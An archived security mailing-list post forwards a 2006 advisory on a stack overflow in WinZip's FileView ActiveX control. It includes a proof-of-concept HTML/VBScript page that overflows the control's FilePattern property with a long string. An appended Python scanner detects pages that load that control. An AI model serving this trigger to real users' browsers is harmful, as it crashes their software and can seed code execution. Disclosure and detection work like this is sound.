Security-Alerts mailing list archive (security-alerts@yandex-team.ru)


[security-alerts] FW: [EXPL] WinZIP Stack Overflow POC (FileView ActiveX Control)



> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx] 
> Sent: Sunday, November 19, 2006 7:06 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [EXPL] WinZIP Stack Overflow POC (FileView ActiveX Control)
> 
> The following security advisory is sent to the securiteam 
> mailing list, and can be found at the SecuriTeam web site: 
> http://www.securiteam.com 
> 
> - - - - - - - - -
> 
> 
> 
> WinZIP Stack Overflow POC (FileView ActiveX Control) 
> 
> 
> 
> "WinZip <http://www.winzip.com/>  is a windows data 
> compression utility that focuses on the Zip data compression 
> format for windows users." 
> 
> A stack overflow vulnerability exists in WinZIP's FileView 
> ActiveX control. 
> 
> 
> Vulnerable Systems: 
>  * WinZIP versions 10.0.7245 and prior. 
> 
> Exploit: 
> <!-- 
> WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability 
> -- prdelka 
> --> 
> 
> <HTML> 
> <HEAD> 
> <TITLE></TITLE> 
> </HEAD> 
> <BODY> 
>     <SCRIPT LANGUAGE="VBScript"> 
> <!-- 
> Sub WZFILEVIEW_OnAfterItemAdd(Item) 
> WZFILEVIEW.FilePattern = 
> 
> "STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV 
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW 
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV 
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW 
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV 
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW 
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV 
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW 
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV 
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW 
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV 
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW 
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV 
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW 
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV 
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW 
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV 
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW 
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV 
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW 
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV 
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW 
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOW" 
> end sub 
> --> 
>     </SCRIPT> 
>     <OBJECT ID="WZFILEVIEW" WIDTH=200 HEIGHT=200 
>      CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904"> 
>     </OBJECT> 
> </BODY> 
> </HTML> 
> 
> 
> Additional Information: 
> The information has been provided by milw0rm 
> <http://www.milw0rm.com/> . 
> The original article can be found at: 
> http://www.milw0rm.com/exploits/2783 
> 
> 
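
A defender-side check for the advisory above, as an added example that is not part of the forwarded message or of the original advisory: it scans an HTML page for an `<OBJECT>` that loads the FileView CLSID quoted in the advisory and for an unusually long string assigned to that object's `FilePattern` property. The 260-character threshold, the function and class names, and the sample page are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID of the WinZip FileView control, taken from the advisory above.
FILEVIEW_CLSID = "A09AE68F-B14D-43ED-B713-BA413F034904"
MAX_PATTERN_LEN = 260  # assumed threshold, not from the advisory; tune locally

class FileViewScanner(HTMLParser):
    """Collects ids of <object> tags loading the control, plus script bodies."""
    def __init__(self):
        super().__init__()
        self.object_ids, self.scripts, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object":
            # Normalise "clsid:{...}" / "CLSID:..." spellings before comparing.
            clsid = re.sub(r"(?i)^clsid:|[{}\s]", "", a.get("classid", ""))
            if clsid.upper() == FILEVIEW_CLSID:
                self.object_ids.append(a.get("id", ""))
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:  # script text can arrive in several chunks
            self.scripts[-1] += data

def scan(html):
    """Return findings: control instantiations and oversized FilePattern writes."""
    p = FileViewScanner()
    p.feed(html)
    p.close()
    findings = [("control-loaded", oid) for oid in p.object_ids]
    for oid in filter(None, p.object_ids):
        # String literal assigned to <id>.FilePattern; whitespace inside the
        # literal is ignored because mail or page wrapping may split it.
        rx = re.compile(re.escape(oid) + r"\.FilePattern\s*=\s*([\"'])(.*?)\1",
                        re.I | re.S)
        for m in rx.finditer("\n".join(p.scripts)):
            n = len(re.sub(r"\s", "", m.group(2)))
            if n > MAX_PATTERN_LEN:
                findings.append(("oversized-FilePattern", n))
    return findings

# Constructed sample page with benign filler (not the advisory's string).
SAMPLE = ('<html><body><script language="VBScript">\nSub FV_OnAfterItemAdd(Item)\n'
          'FV.FilePattern = "' + "A" * 300 + '"\nend sub\n</script>\n'
          '<object id="FV" classid="clsid:' + FILEVIEW_CLSID.lower() + '"></object>'
          '</body></html>')
```

A "control-loaded" finding alone is worth reviewing on any untrusted page, since the advisory describes the control as exposing an unsafe method to script.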



 



